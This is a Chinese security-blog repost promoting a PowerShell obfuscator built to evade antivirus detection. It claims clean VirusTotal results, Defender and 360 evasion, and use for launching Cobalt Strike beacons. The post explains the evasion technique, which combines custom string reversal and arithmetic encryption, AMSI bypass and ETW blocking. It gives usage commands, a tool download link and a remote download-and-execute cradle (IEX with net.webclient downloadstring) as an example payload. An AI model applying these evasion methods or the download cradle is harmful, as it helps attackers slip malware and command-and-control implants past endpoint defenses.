一款Powershell免杀混淆器
2022-12-20 14:1:23 Author: HACK学习君(查看原文) 阅读量:17 收藏

简单有效的powershell免杀混淆的小工具,VT全绿,可过Defender、360等,可执行上线cobaltstrike等操作。

AMSI混淆绕过+ETW混淆block+powershell命令混淆绕过。

思路

这段时间看了看powershell反混淆相关的内容与论文,目前反混淆效果最好的应该是2022年qax的《Invoke-Deobfuscation: AST-Based and Semantics-Preserving Deobfuscation for PowerShell Scripts》,该论文延续了19年CCS浙大的思路并进行了改进,使用了变量追踪并在AST层面上进行了invoke解混淆,比defender和VT的效果好不少。

不过论文中也提到了当前powershell反混淆研究的难点,一个是自定义function加密解不开,一个是很难去追踪循环中的变量。

由于部分的反混淆工具会在AST层面上进行反混淆的工作,因此powershell自带的大部分加密解密/编码解码的函数是形同虚设的,如[System.Convert]::FromBase64String等。应该尽可能去使用自定义的加密解密的function。

这里针对这两个学术界研究的难点,写了一个简单的powershell混淆器,事实证明效果确实也不错。具体思路如下:

1、自定义加密解密function,function中进行字符串的逆序(逆序没有用powershell自带的函数,防止AST层面上解混淆)与字符的+-运算(不使用异或运算的原因是defender对-bxor监控很严格)。

2、对上述function进行几次循环的运算。

3、为了能让字符有效地输出,最后用base64编码了一下(即便在AST层面上解开也无所谓,因为解开了的内容仍是混淆之后的)。

同时对AMSI绕过与ETW block与powershell命令进行了混淆。

这里仅仅实现了一个简单的混淆器demo,可以自由发挥,后续要是有时间的话我会继续完善。

实验了一下,用qax的反混淆工具与Unit42团队的反混淆工具都是解不开的。

使用的方法

./powershell-obfuscation.ps1 -c "whoami" 来混淆命令 obfuscates command./powershell-obfuscation.ps1 -f "filename" 来混淆指定的文件 obfuscates specific file

结果会输出在当前目录下的bypass.ps1中

The result can be found in bypass.ps1.

以cs的beacon.ps1为例

Take beacon.ps1 as an example

同样可以来混淆 IEX ((new-object net.webclient).downloadstring('http://ip:port/a'))

混淆前VT如下:

混淆后VT如下

上线

下载地址:

https://github.com/H4de5-7/powershell-obfuscation


推荐阅读

干货 |GitHUB安全搬运工 二十

干货 |GitHUB安全搬运工 十九

干货 |GitHUB安全搬运工 十八

干货 |GitHUB安全搬运工 十七

星球部分精华内容推荐

其他更多精彩内容,欢迎加入我们的星球


文章来源: http://mp.weixin.qq.com/s?__biz=MzIzNzMxMDkxNw==&mid=2247492122&idx=1&sn=79bddf0ca1458861eaf110f508c906ec&chksm=e8c824b0dfbfada6e080c62ccca5caad21dd794d391d7214361006bde8d2a8ddc4696f054010#rd
如有侵权请联系:admin#unsafe.sh